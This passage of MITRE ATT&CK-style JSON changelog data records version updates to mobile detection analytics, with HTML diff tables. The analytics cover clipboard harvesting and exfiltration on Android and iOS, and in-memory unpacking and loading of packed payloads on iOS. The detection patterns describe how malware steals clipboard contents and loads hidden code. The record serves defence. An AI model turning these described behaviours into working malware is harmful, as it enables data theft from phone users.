class=\"diff_sub\">requests&nbsp;administrator&nbsp;permission.&nbsp;When&nbsp;an&nbsp;application&nbsp;reque</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">l&nbsp;mechanisms&nbsp;(e.g.,&nbsp;Accessibility&nbsp;Service,&nbsp;Device&nbsp;Admin,&nbsp;ove</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">sts&nbsp;administrator&nbsp;permission,&nbsp;the&nbsp;user&nbsp;is&nbsp;presented&nbsp;with&nbsp;a&nbsp;p</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">rlay&nbsp;permissions,&nbsp;package&nbsp;installer&nbsp;flows),&nbsp;(2)&nbsp;rapid&nbsp;transi</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">opup&nbsp;and&nbsp;the&nbsp;option&nbsp;to&nbsp;grant&nbsp;or&nbsp;deny&nbsp;the&nbsp;request.&nbsp;</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">tion&nbsp;to&nbsp;elevated&nbsp;capability&nbsp;state&nbsp;without&nbsp;expected&nbsp;user&nbsp;inte</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">raction&nbsp;patterns,&nbsp;and&nbsp;(3)&nbsp;immediate&nbsp;privileged&nbsp;actions&nbsp;such&nbsp;</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">as&nbsp;sensor&nbsp;access,&nbsp;UI&nbsp;manipulation,&nbsp;or&nbsp;background&nbsp;persistence</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">.&nbsp;The&nbsp;defender&nbsp;observes&nbsp;a&nbsp;causal&nbsp;chain&nbsp;where&nbsp;an&nbsp;application&nbsp;</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">gains&nbsp;elevated&nbsp;privileges&nbsp;through&nbsp;abuse&nbsp;of&nbsp;system-controlled</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">&nbsp;consent&nbsp;flows&nbsp;and&nbsp;subsequently&nbsp;performs&nbsp;actions&nbsp;inconsisten</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">t&nbsp;with&nbsp;normal&nbsp;user-driven&nbsp;authorization.</span></td></tr>\n        </tbody>\n    </table>"
                },
                {
                    "type": "x-mitre-analytic",
                    "id": "x-mitre-analytic--4b2e7e2d-e1be-4829-9011-53eb5eca3dc6",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2025-10-21 15:10:28.402000+00:00",
                    "modified": "2026-01-29 18:06:40.461000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/detectionstrategies/DET0643#AN1719",
                            "external_id": "AN1719"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "Analytic 1719",
                    "description": "From the defender view: an app registers a clipboard listener or calls ClipboardManager getters; the app is (a) foreground, (b) the default IME, or (c) abusing legacy paths. Shortly after each clipboard change, the app reads the primary clip repeatedly, optionally persists content (local file/DB) and/or exfiltrates it. We correlate: listener/clip-access \u2192 privilege/foreground confirmation \u2192 bursty reads \u2192 local write and/or network egress within a tight window.",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "mobile-attack"
                    ],
                    "x_mitre_log_source_references": [
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e",
                            "name": "android:logcat",
                            "channel": "ClipboardManager (addOnPrimaryClipChangedListener|getPrimaryClip|getPrimaryClipDescription) invoked by <pkg>"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--1887a270-576a-4049-84de-ef746b2572d6",
                            "name": "android:logcat",
                            "channel": "Activity/Process state change (mFocusedApp, onResume/onPause) identifying <pkg> as foreground"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--9c2fa0ae-7abc-485a-97f6-699e3b6cf9fa",
                            "name": "android:logcat",
                            "channel": "Default IME active or bound to <pkg> (InputMethodManager reports imeId=<pkg>)"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--2b3bfe19-d59a-460d-93bb-2f546adc2d2c",
                            "name": "android:logcat",
                            "channel": "CREATE/WRITE to app-writable DB/file path indicating clipboard dump (e.g., clipboard.db, clip_*.txt)"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_mutable_elements": [
                        {
                            "field": "TimeWindowSeconds",
                            "description": "Max time between clip access \u2192 persist/exfil (e.g., 5\u201345s)."
                        },
                        {
                            "field": "MinReadBurst",
                            "description": "Minimum reads per clipboard change to flag harvesting (e.g., \u22652)."
                        },
                        {
                            "field": "PersistPathRegex",
                            "description": "Regex for files/DBs used to stash clipboard content in app container."
                        },
                        {
                            "field": "ExfilDomainAllowlist",
                            "description": "Allowlisted domains to suppress false positives for analytics SDKs."
                        },
                        {
                            "field": "ForegroundRequired",
                            "description": "Require foreground unless app is the default IME (true/false)."
                        },
                        {
                            "field": "UserContext",
                            "description": "Work Profile/Developer Mode/Doze to scope alerts."
                        }
                    ],
                    "x_mitre_platforms": [
                        "Android"
                    ],
                    "x_mitre_version": "1.1",
                    "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_mutable_elements']\": [{\"field\": \"TimeWindowSeconds\", \"description\": \"Max time between clip access \\u2192 persist/exfil (e.g., 5\\u201345s).\"}, {\"field\": \"MinReadBurst\", \"description\": \"Minimum reads per clipboard change to flag harvesting (e.g., \\u22652).\"}, {\"field\": \"PersistPathRegex\", \"description\": \"Regex for files/DBs used to stash clipboard content in app container.\"}, {\"field\": \"ExfilDomainAllowlist\", \"description\": \"Allowlisted domains to suppress false positives for analytics SDKs.\"}, {\"field\": \"ForegroundRequired\", \"description\": \"Require foreground unless app is the default IME (true/false).\"}, {\"field\": \"UserContext\", \"description\": \"Work Profile/Developer Mode/Doze to scope alerts.\"}]}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-01-29 18:06:40.461000+00:00\", \"old_value\": \"2025-10-21 15:10:28.402000+00:00\"}, \"root['description']\": {\"new_value\": \"From the defender view: an app registers a clipboard listener or calls ClipboardManager getters; the app is (a) foreground, (b) the default IME, or (c) abusing legacy paths. Shortly after each clipboard change, the app reads the primary clip repeatedly, optionally persists content (local file/DB) and/or exfiltrates it. We correlate: listener/clip-access \\u2192 privilege/foreground confirmation \\u2192 bursty reads \\u2192 local write and/or network egress within a tight window.\", \"old_value\": \"Application vetting services could detect usage of standard clipboard APIs.\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.1\", \"old_value\": \"1.0\"}, \"root['x_mitre_log_source_references'][0]\": {\"new_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e\", \"name\": \"android:logcat\", \"channel\": \"ClipboardManager (addOnPrimaryClipChangedListener|getPrimaryClip|getPrimaryClipDescription) invoked by <pkg>\"}, \"old_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--5ae32c6a-2d12-4b8f-81ca-f862f2be0962\", \"name\": \"Application Vetting\", \"channel\": \"None\"}}}, \"iterable_item_added\": {\"root['x_mitre_log_source_references'][1]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--1887a270-576a-4049-84de-ef746b2572d6\", \"name\": \"android:logcat\", \"channel\": \"Activity/Process state change (mFocusedApp, onResume/onPause) identifying <pkg> as foreground\"}, \"root['x_mitre_log_source_references'][2]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--9c2fa0ae-7abc-485a-97f6-699e3b6cf9fa\", \"name\": \"android:logcat\", \"channel\": \"Default IME active or bound to <pkg> (InputMethodManager reports imeId=<pkg>)\"}, \"root['x_mitre_log_source_references'][3]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--2b3bfe19-d59a-460d-93bb-2f546adc2d2c\", \"name\": \"android:logcat\", \"channel\": \"CREATE/WRITE to app-writable DB/file path indicating clipboard dump (e.g., clipboard.db, clip_*.txt)\"}}}",
                    "previous_version": "1.0",
                    "version_change": "1.0 \u2192 1.1",
                    "description_change_table": "\n    <table class=\"diff\" id=\"difflib_chg_to179__top\"\n           cellspacing=\"0\" cellpadding=\"0\" rules=\"groups\" >\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <thead><tr><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">Old Description</th><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">New Description</th></tr></thead>\n        <tbody>\n            <tr><td class=\"diff_next\" id=\"difflib_chg_to179__0\"><a href=\"#difflib_chg_to179__top\">t</a></td><td class=\"diff_header\" id=\"from179_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_sub\">Application&nbsp;vetting&nbsp;services&nbsp;could&nbsp;detect&nbsp;usage&nbsp;of&nbsp;standard&nbsp;</span></td><td class=\"diff_next\"><a href=\"#difflib_chg_to179__top\">t</a></td><td class=\"diff_header\" id=\"to179_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_add\">From&nbsp;the&nbsp;defender&nbsp;view:&nbsp;an&nbsp;app&nbsp;registers&nbsp;a&nbsp;clipboard&nbsp;listene</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">clipboard&nbsp;APIs.</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">r&nbsp;or&nbsp;calls&nbsp;ClipboardManager&nbsp;getters;&nbsp;the&nbsp;app&nbsp;is&nbsp;(a)&nbsp;foregrou</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">nd,&nbsp;(b)&nbsp;the&nbsp;default&nbsp;IME,&nbsp;or&nbsp;(c)&nbsp;abusing&nbsp;legacy&nbsp;paths.&nbsp;Shortl</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">y&nbsp;after&nbsp;each&nbsp;clipboard&nbsp;change,&nbsp;the&nbsp;app&nbsp;reads&nbsp;the&nbsp;primary&nbsp;cli</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">p&nbsp;repeatedly,&nbsp;optionally&nbsp;persists&nbsp;content&nbsp;(local&nbsp;file/DB)&nbsp;an</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">d/or&nbsp;exfiltrates&nbsp;it.&nbsp;We&nbsp;correlate:&nbsp;listener/clip-access&nbsp;\u2192&nbsp;pr</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ivilege/foreground&nbsp;confirmation&nbsp;\u2192&nbsp;bursty&nbsp;reads&nbsp;\u2192&nbsp;local&nbsp;write</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">&nbsp;and/or&nbsp;network&nbsp;egress&nbsp;within&nbsp;a&nbsp;tight&nbsp;window.</span></td></tr>\n        </tbody>\n    </table>"
                },
                {
                    "type": "x-mitre-analytic",
                    "id": "x-mitre-analytic--2f0ca83e-1318-4722-88b2-1bffedb5d127",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2025-10-21 15:10:28.402000+00:00",
                    "modified": "2026-01-29 18:13:22.436000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/detectionstrategies/DET0643#AN1720",
                            "external_id": "AN1720"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "Analytic 1720",
                    "description": "From the defender view: an app accesses UIPasteboard contents, sometimes repeatedly, including in background or immediately after another app copies sensitive text. iOS 14+ shows user notifications when pasting cross-app; unified logs reflect pasteboard access, notification, and optional subsequent persistence/exfil. We correlate: pasteboard access \u2192 optional cross-app notification \u2192 local write (cache/DB) and/or network egress within a short window.",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "mobile-attack"
                    ],
                    "x_mitre_log_source_references": [
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--9c2fa0ae-7abc-485a-97f6-699e3b6cf9fa",
                            "name": "iOS:unifiedlog",
                            "channel": "UIPasteboard read (general/string/data) by <bundle_id>; repeated reads or background access"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--bf0ff551-a5a7-40e5-bff9-f9405011b1f4",
                            "name": "iOS:unifiedlog",
                            "channel": "\\\"has pasted from\\\" cross-app paste notification text containing source app name"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--2b3bfe19-d59a-460d-93bb-2f546adc2d2c",
                            "name": "iOS:unifiedlog",
                            "channel": "CREATE/WRITE of clipboard dump artifacts in container (clipboard.db, clip_*.txt, caches)"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--1887a270-576a-4049-84de-ef746b2572d6",
                            "name": "iOS:unifiedlog",
                            "channel": "Foreground/background transition for <bundle_id> to contextualize access timing"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_mutable_elements": [
                        {
                            "field": "TimeWindowSeconds",
                            "description": "Max time between pasteboard access \u2192 persist/exfil (e.g., 5\u201360s)."
                        },
                        {
                            "field": "MinReadBurst",
                            "description": "Minimum reads within window to flag harvesting (e.g., \u22652)."
                        },
                        {
                            "field": "PersistPathRegex",
                            "description": "Regex for paste dumps in app container."
                        },
                        {
                            "field": "ExfilDomainAllowlist",
                            "description": "Allowlisted analytics/CDN endpoints."
                        },
                        {
                            "field": "ForegroundRequired",
                            "description": "Require foreground state for benign use; flag background reads."
                        },
                        {
                            "field": "UserContext",
                            "description": "Work profile/MDM policy state to scope alerts."
                        }
                    ],
                    "x_mitre_platforms": [
                        "iOS"
                    ],
                    "x_mitre_version": "1.1",
                    "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_mutable_elements']\": [{\"field\": \"TimeWindowSeconds\", \"description\": \"Max time between pasteboard access \\u2192 persist/exfil (e.g., 5\\u201360s).\"}, {\"field\": \"MinReadBurst\", \"description\": \"Minimum reads within window to flag harvesting (e.g., \\u22652).\"}, {\"field\": \"PersistPathRegex\", \"description\": \"Regex for paste dumps in app container.\"}, {\"field\": \"ExfilDomainAllowlist\", \"description\": \"Allowlisted analytics/CDN endpoints.\"}, {\"field\": \"ForegroundRequired\", \"description\": \"Require foreground state for benign use; flag background reads.\"}, {\"field\": \"UserContext\", \"description\": \"Work profile/MDM policy state to scope alerts.\"}]}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-01-29 18:13:22.436000+00:00\", \"old_value\": \"2025-10-21 15:10:28.402000+00:00\"}, \"root['description']\": {\"new_value\": \"From the defender view: an app accesses UIPasteboard contents, sometimes repeatedly, including in background or immediately after another app copies sensitive text. iOS 14+ shows user notifications when pasting cross-app; unified logs reflect pasteboard access, notification, and optional subsequent persistence/exfil. We correlate: pasteboard access \\u2192 optional cross-app notification \\u2192 local write (cache/DB) and/or network egress within a short window.\", \"old_value\": \"Application vetting services could detect usage of standard clipboard APIs.\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.1\", \"old_value\": \"1.0\"}, \"root['x_mitre_log_source_references'][0]\": {\"new_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--9c2fa0ae-7abc-485a-97f6-699e3b6cf9fa\", \"name\": \"iOS:unifiedlog\", \"channel\": \"UIPasteboard read (general/string/data) by <bundle_id>; repeated reads or background access\"}, \"old_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--5ae32c6a-2d12-4b8f-81ca-f862f2be0962\", \"name\": \"Application Vetting\", \"channel\": \"None\"}}}, \"iterable_item_added\": {\"root['x_mitre_log_source_references'][1]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--bf0ff551-a5a7-40e5-bff9-f9405011b1f4\", \"name\": \"iOS:unifiedlog\", \"channel\": \"\\\\\\\"has pasted from\\\\\\\" cross-app paste notification text containing source app name\"}, \"root['x_mitre_log_source_references'][2]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--2b3bfe19-d59a-460d-93bb-2f546adc2d2c\", \"name\": \"iOS:unifiedlog\", \"channel\": \"CREATE/WRITE of clipboard dump artifacts in container (clipboard.db, clip_*.txt, caches)\"}, \"root['x_mitre_log_source_references'][3]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--1887a270-576a-4049-84de-ef746b2572d6\", \"name\": \"iOS:unifiedlog\", \"channel\": \"Foreground/background transition for <bundle_id> to contextualize access timing\"}}}",
                    "previous_version": "1.0",
                    "version_change": "1.0 \u2192 1.1",
                    "description_change_table": "\n    <table class=\"diff\" id=\"difflib_chg_to173__top\"\n           cellspacing=\"0\" cellpadding=\"0\" rules=\"groups\" >\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <thead><tr><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">Old Description</th><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">New Description</th></tr></thead>\n        <tbody>\n            <tr><td class=\"diff_next\" id=\"difflib_chg_to173__0\"><a href=\"#difflib_chg_to173__top\">t</a></td><td class=\"diff_header\" id=\"from173_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_sub\">Application&nbsp;vetting&nbsp;services&nbsp;could&nbsp;detect&nbsp;usage&nbsp;of&nbsp;standard&nbsp;</span></td><td class=\"diff_next\"><a href=\"#difflib_chg_to173__top\">t</a></td><td class=\"diff_header\" id=\"to173_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_add\">From&nbsp;the&nbsp;defender&nbsp;view:&nbsp;an&nbsp;app&nbsp;accesses&nbsp;UIPasteboard&nbsp;content</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">clipboard&nbsp;APIs.</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">s,&nbsp;sometimes&nbsp;repeatedly,&nbsp;including&nbsp;in&nbsp;background&nbsp;or&nbsp;immediat</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ely&nbsp;after&nbsp;another&nbsp;app&nbsp;copies&nbsp;sensitive&nbsp;text.&nbsp;iOS&nbsp;14+&nbsp;shows&nbsp;u</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ser&nbsp;notifications&nbsp;when&nbsp;pasting&nbsp;cross-app;&nbsp;unified&nbsp;logs&nbsp;refle</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ct&nbsp;pasteboard&nbsp;access,&nbsp;notification,&nbsp;and&nbsp;optional&nbsp;subsequent&nbsp;</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">persistence/exfil.&nbsp;We&nbsp;correlate:&nbsp;pasteboard&nbsp;access&nbsp;\u2192&nbsp;optiona</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">l&nbsp;cross-app&nbsp;notification&nbsp;\u2192&nbsp;local&nbsp;write&nbsp;(cache/DB)&nbsp;and/or&nbsp;net</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">work&nbsp;egress&nbsp;within&nbsp;a&nbsp;short&nbsp;window.</span></td></tr>\n        </tbody>\n    </table>"
                },
                {
                    "type": "x-mitre-analytic",
                    "id": "x-mitre-analytic--75a0da5c-9f2b-4e96-bb94-10c30f16a9a2",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2025-10-21 15:10:28.402000+00:00",
                    "modified": "2026-01-29 17:01:36.709000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/detectionstrategies/DET0644#AN1721",
                            "external_id": "AN1721"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "Analytic 1721",
                    "description": "From the defender view: a sandboxed process receives/creates a high-entropy Mach-O/bundle or encrypted segment, performs in-memory decrypt/unpack (mmap/mprotect RW\u2192RX or RWX), optionally drops a transient image in app-writable dirs, then loads it through dyld/dlopen or spawns it. We correlate: (1) opaque blob write/arrival \u2192 (2) kernel memory protection changes \u2192 (3) dyld/dlopen from app-writable path or posix_spawn of a recently created image \u2192 (4) (optional) code-sign evaluation anomalies for the new image.",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "mobile-attack"
                    ],
                    "x_mitre_log_source_references": [
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--2b3bfe19-d59a-460d-93bb-2f546adc2d2c",
                            "name": "iOS:unifiedlog",
                            "channel": "Create/write of high-entropy Mach-O/bundle or generic blob in /var/mobile/Containers/Data/Application/<GUID>/(tmp|Library/Caches)/"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e",
                            "name": "iOS:unifiedlog",
                            "channel": "mmap/mprotect transitions to PROT_EXEC for pages associated with recently written files"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--c0a4a086-cc20-4e1e-b7cb-29d99dfa3fb1",
                            "name": "iOS:unifiedlog",
                            "channel": "dlopen/image load from app-writable path (tmp, Caches) outside bundled resources"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_mutable_elements": [
                        {
                            "field": "TimeWindowSeconds",
                            "description": "Correlation window from write\u2192rwx\u2192load/exec (e.g., 5\u201345s)."
                        },
                        {
                            "field": "PayloadEntropyThreshold",
                            "description": "Entropy to flag packed blobs (e.g., \u2265 7.3)."
                        },
                        {
                            "field": "RWXPageMinKB",
                            "description": "Minimum RWX allocation size (e.g., \u2265 32KB)."
                        },
                        {
                            "field": "KnownJITAllowlist",
                            "description": "Bundle IDs legitimately using JIT to avoid RWX false positives."
                        },
                        {
                            "field": "WritableLoadPathRegex",
                            "description": "Regex for app-writable load paths (tmp, Caches) outside app bundle."
                        },
                        {
                            "field": "UnsignedExecPolicy",
                            "description": "Tuning if enterprise/dev provisioning allows non-App Store binaries."
                        }
                    ],
                    "x_mitre_platforms": [
                        "iOS"
                    ],
                    "x_mitre_version": "1.1",
                    "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_mutable_elements']\": [{\"field\": \"TimeWindowSeconds\", \"description\": \"Correlation window from write\\u2192rwx\\u2192load/exec (e.g., 5\\u201345s).\"}, {\"field\": \"PayloadEntropyThreshold\", \"description\": \"Entropy to flag packed blobs (e.g., \\u2265 7.3).\"}, {\"field\": \"RWXPageMinKB\", \"description\": \"Minimum RWX allocation size (e.g., \\u2265 32KB).\"}, {\"field\": \"KnownJITAllowlist\", \"description\": \"Bundle IDs legitimately using JIT to avoid RWX false positives.\"}, {\"field\": \"WritableLoadPathRegex\", \"description\": \"Regex for app-writable load paths (tmp, Caches) outside app bundle.\"}, {\"field\": \"UnsignedExecPolicy\", \"description\": \"Tuning if enterprise/dev provisioning allows non-App Store binaries.\"}]}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-01-29 17:01:36.709000+00:00\", \"old_value\": \"2025-10-21 15:10:28.402000+00:00\"}, \"root['description']\": {\"new_value\": \"From the defender view: a sandboxed process receives/creates a high-entropy Mach-O/bundle or encrypted segment, performs in-memory decrypt/unpack (mmap/mprotect RW\\u2192RX or RWX), optionally drops a transient image in app-writable dirs, then loads it through dyld/dlopen or spawns it. We correlate: (1) opaque blob write/arrival \\u2192 (2) kernel memory protection changes \\u2192 (3) dyld/dlopen from app-writable path or posix_spawn of a recently created image \\u2192 (4) (optional) code-sign evaluation anomalies for the new image.\", \"old_value\": \"Application vetting services could look for known software packers or artifacts of packing techniques. Packing is not a definitive indicator of malicious activity, because as legitimate software may use packing techniques to reduce binary size or to protect proprietary code.\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.1\", \"old_value\": \"1.0\"}, \"root['x_mitre_log_source_references'][0]\": {\"new_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--2b3bfe19-d59a-460d-93bb-2f546adc2d2c\", \"name\": \"iOS:unifiedlog\", \"channel\": \"Create/write of high-entropy Mach-O/bundle or generic blob in /var/mobile/Containers/Data/Application/<GUID>/(tmp|Library/Caches)/\"}, \"old_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--5ae32c6a-2d12-4b8f-81ca-f862f2be0962\", \"name\": \"Application Vetting\", \"channel\": \"None\"}}}, \"iterable_item_added\": {\"root['x_mitre_log_source_references'][1]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e\", \"name\": \"iOS:unifiedlog\", \"channel\": \"mmap/mprotect transitions to PROT_EXEC for pages associated with recently written files\"}, \"root['x_mitre_log_source_references'][2]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--c0a4a086-cc20-4e1e-b7cb-29d99dfa3fb1\", \"name\": \"iOS:unifiedlog\", \"channel\": \"dlopen/image load from app-writable path (tmp, Caches) outside bundled resources\"}}}",
                    "previous_version": "1.0",
                    "version_change": "1.0 \u2192 1.1",
